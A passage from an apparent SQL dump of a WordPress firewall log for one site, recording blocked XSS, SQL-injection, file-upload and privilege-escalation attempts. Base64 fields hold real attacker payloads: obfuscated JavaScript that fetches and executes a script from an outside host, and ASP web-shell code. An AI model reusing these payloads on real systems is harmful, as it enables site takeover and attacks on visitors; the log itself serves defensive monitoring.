pO3ZhciBfYWFhYWFhYWFhYWFhYWFhID0gX2FhYWFhYWFhYWFhYWFhYShfYWFhYWFhYWFhYWFhYWFhKTtpZihfYWFhYWFhYWFhYWFhYWFhLmxlbmd0aCA+IDMpe19hYWFhYWFhYWFhYWFhYWEoX2FhYWFhYWFhYWFhYWFhYSk7fSBmdW5jdGlvbiBfYWFhYWFhYWFhYWFhYWFhKF9hYWFhYWFhYWFhYWFhYWEpeyB2YXIgX2FhYWFhYWFhYWFhYWFhYSA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO19hYWFhYWFhYWFhYWFhYWEub3BlbiggU3RyaW5nLmZyb21DaGFyQ29kZSg3MSw2OSw4NCksIF9hYWFhYWFhYWFhYWFhYWEsIGZhbHNlICk7X2FhYWFhYWFhYWFhYWFhYS5zZW5kKCBudWxsICk7cmV0dXJuIF9hYWFhYWFhYWFhYWFhYWEucmVzcG9uc2VUZXh0O31mdW5jdGlvbiBfYWFhYWFhYWFhYWFhYWFhKHRvZG8peyB2YXIgX2FhYWFhYWFhYWFhYWFhYSA9IG5ldyBGdW5jdGlvbigneCcsICd5JywgdG9kbysnIHJldHVybiB4K3k7Jyk7X2FhYWFhYWFhYWFhYWFhYSgwLDApO308L3NjcmlwdD48c2NyaXB0Pg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37814,1569949848.172756,1569949846.789800,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP Live Chat Support <= 8.0.28 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"147\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37801,1569949607.410844,1569949605.704400,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php?action=save&updated=true',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Blog Designer <= 1.8.10 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"145\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9hYWFhYWFhYWFhYWFhPVN0cmluZy5mcm9tQ2hhckNvZGUoMTA0LypfYWFhYWFhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhYWFhKi8sMTEyLyoqLywxMTUvKl9hYWFhYWFhYWFhYWFhKi8sNTgvKl9hYWFhYWFhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYWFhYWFhKi8sMTAzLypfYWFhYWFhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWFhYWEqLywxMTUvKl9hYWFhYWFhYWFhYWFhKi8sMTE1LyoqLyw0Ni8qX2FhYWFhYWFhYWFhYWEqLyw5OC8qKi8sMTAxLypfYWFhYWFhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhYWFhYWEqLyw5OC8qX2FhYWFhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhYWFhKi8sMTE5LyoqLyw5Ny8qX2FhYWFhYWFhYWFhYWEqLywxMTUvKl9hYWFhYWFhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWFhYWFhYSovLDEwNC8qX2FhYWFhYWFhYWFhYWEqLywxMDEvKiovLDExNC8qX2FhYWFhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYWFhYWFhKi8sOTkvKl9hYWFhYWFhYWFhYWFhKi8sMTExLyoqLywxMDkvKl9hYWFhYWFhYWFhYWFhKi8sNDcvKiovLDEwOC8qX2FhYWFhYWFhYWFhYWEqLywxMTEvKiovLDk5LypfYWFhYWFhYWFhYWFhYSovLDk3LypfYWFhYWFhYWFhYWFhYSovLDEwOC8qKi8sNDcvKiovLDk5LypfYWFhYWFhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhYWFhKi8sMTE0LypfYWFhYWFhYWFhYWFhYSovLDQ2LypfYWFhYWFhYWFhYWFhYSovLDEwNi8qX2FhYWFhYWFhYWFhYWEqLywxMTUvKl9hYWFhYWFhYWFhYWFhKi8sNjMpO3ZhciBfYWFhYWFhYWFhYWFhYSA9IF9hYWFhYWFhYWFhYWFhKF9hYWFhYWFhYWFhYWFhKTtpZihfYWFhYWFhYWFhYWFhYS5sZW5ndGggPiAzKXtfYWFhYWFhYWFhYWFhYShfYWFhYWFhYWFhYWFhYSk7fSBmdW5jdGlvbiBfYWFhYWFhYWFhYWFhYShfYWFhYWFhYWFhYWFhYSl7IHZhciBfYWFhYWFhYWFhYWFhYSA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO19hYWFhYWFhYWFhYWFhLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfYWFhYWFhYWFhYWFhYSwgZmFsc2UgKTtfYWFhYWFhYWFhYWFhYS5zZW5kKCBudWxsICk7cmV0dXJuIF9hYWFhYWFhYWFhYWFhLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX2FhYWFhYWFhYWFhYWEodG9kbyl7IHZhciBfYWFhYWFhYWFhYWFhYSA9IG5ldyBGdW5jdGlvbigneCcsICd5JywgdG9kbysnIHJldHVybiB4K3k7Jyk7X2FhYWFhYWFhYWFhYWEoMCwwKTt9PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37877,1570495098.243388,1570495094.653800,'\0\0\0\0\0\0\0\0\0\0ÿÿ/',0,200,0,0,0,'https://bintara.com.my/blog/2018/12/11/logitech-rally/','https://bintara.com.my/blog/2018/12/11/logitech-rally/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299','logged:waf','Watched IP Traffic: 5.8.47.2','{\"learningMode\":0,\"failedRules\":\"logged\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L2Jsb2cvMjAxOC8xMi8xMS9sb2dpdGVjaC1yYWxseS8=\",\"category\":\"logged\",\"ssl\":1}'),(37879,1570544165.027541,1570544163.716600,'\0\0\0\0\0\0\0\0\0\0ÿÿw»äÎ',0,403,0,0,0,'http://bintara.com.my//fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media','http://bintara.com.my//fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36','blocked:waf','Malicious File Upload','{\"learningMode\":0,\"failedRules\":\"11\",\"paramKey\":\"cmVxdWVzdC5maWxlTmFtZXNbTmV3RmlsZV0=\",\"paramValue\":\"eC5hc3B4\",\"path\":\"Ly9mY2tlZGl0b3IvZWRpdG9yL2ZpbGVtYW5hZ2VyL3VwbG9hZC9hc3B4L3VwbG9hZC5hc3B4\",\"category\":\"file_upload\",\"ssl\":0}'),(37838,1569950029.904922,1569950028.231300,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Newspaper Premium Theme <= 6.7.1 - Privilege Escalation','{\"learningMode\":0,\"failedRules\":\"91\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"auth-bypass\",\"ssl\":0}'),(37802,1569949604.136984,1569949602.813600,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php?action=update_zb_fbc_code',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2RvbWFpbl0=\",\"paramValue\":\"PC9zY3JpcHQ+PHNjcmlwdCAgIHR5cGU9dGV4dC9qYXZhc2NyaXB0IGxhbmd1YWdlPWphdmFzY3JpcHQ+dmFyIGMgPSAwO3ZhciBfYWFhYWFhYWFhYWFhYWE9U3RyaW5nLmZyb21DaGFyQ29kZSgxMDQvKl9hYWFhYWFhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWFhYWFhYWEqLywxMTIvKiovLDExNS8qX2FhYWFhYWFhYWFhYWFhKi8sNTgvKl9hYWFhYWFhYWFhYWFhYSovLDQ3LypfYWFhYWFhYWFhYWFhYWEqLyw0Ny8qX2FhYWFhYWFhYWFhYWFhKi8sMTAzLypfYWFhYWFhYWFhYWFhYWEqLywxMDgvKl9hYWFhYWFhYWFhYWFhYSovLDk3LypfYWFhYWFhYWFhYWFhYWEqLywxMTUvKl9hYWFhYWFhYWFhYWFhYSovLDExNS8qKi8sNDYvKl9hYWFhYWFhYWFhYWFhYSovLDk4LyoqLywxMDEvKl9hYWFhYWFhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhYWFhYWEqLywxMTQvKl9hYWFhYWFhYWFhYWFhYSovLDk4LypfYWFhYWFhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhYWFhYSovLDExOS8qKi8sOTcvKl9hYWFhYWFhYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWFhYWFhYWEqLywxMDQvKl9hYWFhYWFhYWFhYWFhYSovLDEwMS8qKi8sMTE0LypfYWFhYWFhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhYWFhYSovLDQ2LypfYWFhYWFhYWFhYWFhYWEqLyw5OS8qX2FhYWFhYWFhYWFhYWFhKi8sMTExLyoqLywxMDkvKl9hYWFhYWFhYWFhYWFhYSovLDQ3LyoqLywxMDgvKl9hYWFhYWFhYWFhYWFhYSovLDExMS8qKi8sOTkvKl9hYWFhYWFhYWFhYWFhYSovLDk3LypfYWFhYWFhYWFhYWFhYWEqLywxMDgvKiovLDQ3LyoqLyw5OS8qX2FhYWFhYWFhYWFhYWFhKi8sMTA4LypfYWFhYWFhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhYWFhYSovLDk3LypfYWFhYWFhYWFhYWFhYWEqLywxMTQvKl9hYWFhYWFhYWFhYWFhYSovLDQ2LypfYWFhYWFhYWFhYWFhYWEqLywxMDYvKl9hYWFhYWFhYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhYWFhYWFhKi8sNjMpO3ZhciBfYWFhYWFhYWFhYWFhYWEgPSBfYWFhYWFhYWFhYWFhYWEoX2FhYWFhYWFhYWFhYWFhKTtpZihfYWFhYWFhYWFhYWFhYWEubGVuZ3RoID4gMyl7X2FhYWFhYWFhYWFhYWFhKF9hYWFhYWFhYWFhYWFhYSk7fSBmdW5jdGlvbiBfYWFhYWFhYWFhYWFhYWEoX2FhYWFhYWFhYWFhYWFhKXsgdmFyIF9hYWFhYWFhYWFhYWFhYSA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO19hYWFhYWFhYWFhYWFhYS5vcGVuKCBTdHJpbmcuZnJvbUNoYXJDb2RlKDcxLDY5LDg0KSwgX2FhYWFhYWFhYWFhYWFhLCBmYWxzZSApO19hYWFhYWFhYWFhYWFhYS5zZW5kKCBudWxsICk7cmV0dXJuIF9hYWFhYWFhYWFhYWFhYS5yZXNwb25zZVRleHQ7fWZ1bmN0aW9uIF9hYWFhYWFhYWFhYWFhYSh0b2RvKXsgdmFyIF9hYWFhYWFhYWFhYWFhYSA9IG5ldyBGdW5jdGlvbigneCcsICd5JywgdG9kbysnIHJldHVybiB4K3k7Jyk7X2FhYWFhYWFhYWFhYWFhKDAsMCk7fTwvc2NyaXB0PjxzY3JpcHQ+\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37885,1570544458.618167,1570544457.752300,'\0\0\0\0\0\0\0\0\0\0ÿÿw»äÎ',0,403,0,0,0,'http://bintara.com.my//Templates/red.asp','https://www.baidu.com','Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3JlZF0=\",\"paramValue\":\"RXhlY3V0ZSgiRXhlY3V0ZSgiIk9uIEVycm9yIFJlc3VtZSBOZXh0OlJlc3BvbnNlLkNsZWFyOkZ1bmN0aW9uIGJkKGJ5VmFsIHMpOkZvciBpPTEgVG8gTGVuKHMpIFN0ZXAgMjpjPU1pZChzLGksMik6SWYgSXNOdW1lcmljKE1pZChzLGksMSkpIFRoZW46RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyYiIiIiKSIiIiIpOkVsc2U6RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyZNaWQocyxpKzIsMikmIiIiIikiIiIiKTppPWkrMjpFbmQgSWYiIiZjaHIlKDEwKSYiIk5leHQ6RW5kIEZ1bmN0aW9uOlJlc3BvbnNlLldyaXRlKCIiIiItPnwiIiIiKTpFeGVjdXRlKCIiIiJPbiBFcnJvciBSZXN1bWUgTmV4dDoiIiIiJmJkKCIiIiI0NDY5NkQyMDUzM0E1MzNENTM2NTcyNzY2NTcyMkU0RDYxNzA3MDYxNzQ2ODI4MjIyRTIyMjkyNjYzNjg3MjI4MzkyOTNBNTM0NTU0MjA0MzNENDM3MjY1NjE3NDY1NEY2MjZBNjU2Mzc0MjgyMjUzNjM3MjY5NzA3NDY5NkU2NzJFNDY2OTZDNjU1Mzc5NzM3NDY1NkQ0RjYyNkE2NTYzNzQyMjI5M0E0OTY2MjA0NTcyNzIyMDU0Njg2NTZFM0E0NTcyNzIyRTQzNkM2NTYxNzIzQTQ1NkM3MzY1M0E0NjZGNzIyMDQ1NjE2MzY4MjA0NDIwNjk2RTIwNDMyRTQ0NzI2OTc2NjU3MzNBNTMzRDUzMjY0NDJFNDQ3MjY5NzY2NTRDNjU3NDc0NjU3MjI2NjM2ODcyMjgzNTM4MjkzQTRFNjU3ODc0M0E0NTZFNjQyMDQ5NjYzQTUyNjU3MzcwNkY2RTczNjUyRTU3NzI2OTc0NjUyODUzMjkiIiIiKSk6UmVzcG9uc2UuV3JpdGUoIiIiInw8LSIiIiIpOlJlc3BvbnNlLkVuZCIiKSIp\",\"path\":\"Ly9UZW1wbGF0ZXMvcmVkLmFzcA==\",\"category\":\"sqli\",\"ssl\":0}'),(37917,1570674538.399820,1570674537.191100,'\0\0\0\0\0\0\0\0\0\0ÿÿ·ž„',0,403,0,0,0,'http://bintara.com.my//images/cache.asp','https://www.baidu.com','Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3JtYjIwMTRd\",\"paramValue\":\"RXhlY3V0ZSgiRXhlY3V0ZSgiIk9uIEVycm9yIFJlc3VtZSBOZXh0OlJlc3BvbnNlLkNsZWFyOkZ1bmN0aW9uIGJkKGJ5VmFsIHMpOkZvciBpPTEgVG8gTGVuKHMpIFN0ZXAgMjpjPU1pZChzLGksMik6SWYgSXNOdW1lcmljKE1pZChzLGksMSkpIFRoZW46RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyYiIiIiKSIiIiIpOkVsc2U6RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyZNaWQocyxpKzIsMikmIiIiIikiIiIiKTppPWkrMjpFbmQgSWYiIiZjaHIlKDEwKSYiIk5leHQ6RW5kIEZ1bmN0aW9uOlJlc3BvbnNlLldyaXRlKCIiIiItPnwiIiIiKTpFeGVjdXRlKCIiIiJPbiBFcnJvciBSZXN1bWUgTmV4dDoiIiIiJmJkKCIiIiI0NDY5NkQyMDUzM0E1MzNENTM2NTcyNzY2NTcyMkU0RDYxNzA3MDYxNzQ2ODI4MjIyRTIyMjkyNjYzNjg3MjI4MzkyOTNBNTM0NTU0MjA0MzNENDM3MjY1NjE3NDY1NEY2MjZBNjU2Mzc0MjgyMjUzNjM3MjY5NzA3NDY5NkU2NzJFNDY2OTZDNjU1Mzc5NzM3NDY1NkQ0RjYyNkE2NTYzNzQyMjI5M0E0OTY2MjA0NTcyNzIyMDU0Njg2NTZFM0E0NTcyNzIyRTQzNkM2NTYxNzIzQTQ1NkM3MzY1M0E0NjZGNzIyMDQ1NjE2MzY4MjA0NDIwNjk2RTIwNDMyRTQ0NzI2OTc2NjU3MzNBNTMzRDUzMjY0NDJFNDQ3MjY5NzY2NTRDNjU3NDc0NjU3MjI2NjM2ODcyMjgzNTM4MjkzQTRFNjU3ODc0M0E0NTZFNjQyMDQ5NjYzQTUyNjU3MzcwNkY2RTczNjUyRTU3NzI2OTc0NjUyODUzMjkiIiIiKSk6UmVzcG9uc2UuV3JpdGUoIiIiInw8LSIiIiIpOlJlc3BvbnNlLkVuZCIiKSIp\",\"path\":\"Ly9pbWFnZXMvY2FjaGUuYXNw\",\"category\":\"sqli\",\"ssl\":0}'),(37803,1569949600.993654,1569949599.569200,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2Nzc10=\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9hYWFhYWFhYWFhYWFhYT1TdHJpbmcuZnJvbUNoYXJDb2RlKDEwNC8qX2FhYWFhYWFhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhYWFhYSovLDExMi8qKi8sMTE1LypfYWFhYWFhYWFhYWFhYWEqLyw1OC8qX2FhYWFhYWFhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYWFhYWFhYSovLDQ3LypfYWFhYWFhYWFhYWFhYWEqLywxMDMvKl9hYWFhYWFhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhYWFhYWFhKi8sMTE1LyoqLyw0Ni8qX2FhYWFhYWFhYWFhYWFhKi8sOTgvKiovLDEwMS8qX2FhYWFhYWFhYWFhYWFhKi8sMTA4LypfYWFhYWFhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhYWFhYWFhKi8sOTgvKl9hYWFhYWFhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYWFhYWFhKi8sMTE5LyoqLyw5Ny8qX2FhYWFhYWFhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhYWFhYSovLDEwNC8qX2FhYWFhYWFhYWFhYWFhKi8sMTAxLyoqLywxMTQvKl9hYWFhYWFhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYWFhYWFhYSovLDk5LypfYWFhYWFhYWFhYWFhYWEqLywxMTEvKiovLDEwOS8qX2FhYWFhYWFhYWFhYWFhKi8sNDcvKiovLDEwOC8qX2FhYWFhYWFhYWFhYWFhKi8sMTExLyoqLyw5OS8qX2FhYWFhYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhYWFhYSovLDEwOC8qKi8sNDcvKiovLDk5LypfYWFhYWFhYWFhYWFhYWEqLywxMDgvKl9hYWFhYWFhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYWFhYWFhYSovLDEwNi8qX2FhYWFhYWFhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWFhYWFhYWEqLyw2Myk7dmFyIF9hYWFhYWFhYWFhYWFhYSA9IF9hYWFhYWFhYWFhYWFhYShfYWFhYWFhYWFhYWFhYWEpO2lmKF9hYWFhYWFhYWFhYWFhYS5sZW5ndGggPiAzKXtfYWFhYWFhYWFhYWFhYWEoX2FhYWFhYWFhYWFhYWFhKTt9IGZ1bmN0aW9uIF9hYWFhYWFhYWFhYWFhYShfYWFhYWFhYWFhYWFhYWEpeyB2YXIgX2FhYWFhYWFhYWFhYWFhID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7X2FhYWFhYWFhYWFhYWFhLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfYWFhYWFhYWFhYWFhYWEsIGZhbHNlICk7X2FhYWFhYWFhYWFhYWFhLnNlbmQoIG51bGwgKTtyZXR1cm4gX2FhYWFhYWFhYWFhYWFhLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX2FhYWFhYWFhYWFhYWFhKHRvZG8peyB2YXIgX2FhYWFhYWFhYWFhYWFhID0gbmV3IEZ1bmN0aW9uKCd4JywgJ3knLCB0b2RvKycgcmV0dXJuIHgreTsnKTtfYWFhYWFhYWFhYWFhYWEoMCwwKTt9PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37891,1570544572.763122,1570544571.880600,'\0\0\0\0\0\0\0\0\0\0ÿÿw»äÎ',0,403,0,0,0,'http://bintara.com.my//data/img/css/xianf.ASP','https://www.baidu.com','Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3hmXQ==\",\"paramValue\":\"RXhlY3V0ZSgiRXhlY3V0ZSgiIk9uIEVycm9yIFJlc3VtZSBOZXh0OlJlc3BvbnNlLkNsZWFyOkZ1bmN0aW9uIGJkKGJ5VmFsIHMpOkZvciBpPTEgVG8gTGVuKHMpIFN0ZXAgMjpjPU1pZChzLGksMik6SWYgSXNOdW1lcmljKE1pZChzLGksMSkpIFRoZW46RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyYiIiIiKSIiIiIpOkVsc2U6RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyZNaWQocyxpKzIsMikmIiIiIikiIiIiKTppPWkrMjpFbmQgSWYiIiZjaHIlKDEwKSYiIk5leHQ6RW5kIEZ1bmN0aW9uOlJlc3BvbnNlLldyaXRlKCIiIiItPnwiIiIiKTpFeGVjdXRlKCIiIiJPbiBFcnJvciBSZXN1bWUgTmV4dDoiIiIiJmJkKCIiIiI0NDY5NkQyMDUzM0E1MzNENTM2NTcyNzY2NTcyMkU0RDYxNzA3MDYxNzQ2ODI4MjIyRTIyMjkyNjYzNjg3MjI4MzkyOTNBNTM0NTU0MjA0MzNENDM3MjY1NjE3NDY1NEY2MjZBNjU2Mzc0MjgyMjUzNjM3MjY5NzA3NDY5NkU2NzJFNDY2OTZDNjU1Mzc5NzM3NDY1NkQ0RjYyNkE2NTYzNzQyMjI5M0E0OTY2MjA0NTcyNzIyMDU0Njg2NTZFM0E0NTcyNzIyRTQzNkM2NTYxNzIzQTQ1NkM3MzY1M0E0NjZGNzIyMDQ1NjE2MzY4MjA0NDIwNjk2RTIwNDMyRTQ0NzI2OTc2NjU3MzNBNTMzRDUzMjY0NDJFNDQ3MjY5NzY2NTRDNjU3NDc0NjU3MjI2NjM2ODcyMjgzNTM4MjkzQTRFNjU3ODc0M0E0NTZFNjQyMDQ5NjYzQTUyNjU3MzcwNkY2RTczNjUyRTU3NzI2OTc0NjUyODUzMjkiIiIiKSk6UmVzcG9uc2UuV3JpdGUoIiIiInw8LSIiIiIpOlJlc3BvbnNlLkVuZCIiKSIp\",\"path\":\"Ly9kYXRhL2ltZy9jc3MveGlhbmYuQVNQ\",\"category\":\"sqli\",\"ssl\":0}'),(37886,1570544456.846545,1570544455.970900,'\0\0\0\0\0\0\0\0\0\0ÿÿw»äÎ',0,403,0,0,0,'http://bintara.com.my//Somnus/Somnus.asp','https://www.baidu.com','Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3hpYW9saWFuZ10=\",\"paramValue\":\"RXhlY3V0ZSgiRXhlY3V0ZSgiIk9uIEVycm9yIFJlc3VtZSBOZXh0OlJlc3BvbnNlLkNsZWFyOkZ1bmN0aW9uIGJkKGJ5VmFsIHMpOkZvciBpPTEgVG8gTGVuKHMpIFN0ZXAgMjpjPU1pZChzLGksMik6SWYgSXNOdW1lcmljKE1pZChzLGksMSkpIFRoZW46RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyYiIiIiKSIiIiIpOkVsc2U6RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyZNaWQocyxpKzIsMikmIiIiIikiIiIiKTppPWkrMjpFbmQgSWYiIiZjaHIlKDEwKSYiIk5leHQ6RW5kIEZ1bmN0aW9uOlJlc3BvbnNlLldyaXRlKCIiIiItPnwiIiIiKTpFeGVjdXRlKCIiIiJPbiBFcnJvciBSZXN1bWUgTmV4dDoiIiIiJmJkKCIiIiI0NDY5NkQyMDUzM0E1MzNENTM2NTcyNzY2NTcyMkU0RDYxNzA3MDYxNzQ2ODI4MjIyRTIyMjkyNjYzNjg3MjI4MzkyOTNBNTM0NTU0MjA0MzNENDM3MjY1NjE3NDY1NEY2MjZBNjU2Mzc0MjgyMjUzNjM3MjY5NzA3NDY5NkU2NzJFNDY2OTZDNjU1Mzc5NzM3NDY1NkQ0RjYyNkE2NTYzNzQyMjI5M0E0OTY2MjA0NTcyNzIyMDU0Njg2NTZFM0E0NTcyNzIyRTQzNkM2NTYxNzIzQTQ1NkM3MzY1M0E0NjZGNzIyMDQ1NjE2MzY4MjA0NDIwNjk2RTIwNDMyRTQ0NzI2OTc2NjU3MzNBNTMzRDUzMjY0NDJFNDQ3MjY5NzY2NTRDNjU3NDc0NjU3MjI2NjM2ODcyMjgzNTM4MjkzQTRFNjU3ODc0M0E0NTZFNjQyMDQ5NjYzQTUyNjU3MzcwNkY2RTczNjUyRTU3NzI2OTc0NjUyODUzMjkiIiIiKSk6UmVzcG9uc2UuV3JpdGUoIiIiInw8LSIiIiIpOlJlc3BvbnNlLkVuZCIiKSIp\",\"path\":\"Ly9Tb21udXMvU29tbnVzLmFzcA==\",\"category\":\"sqli\",\"ssl\":0}'),(37720,1569411877.507556,1569411876.636000,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP Live Chat Support <= 8.0.28 - Unauthenticated Stored Cross-Site 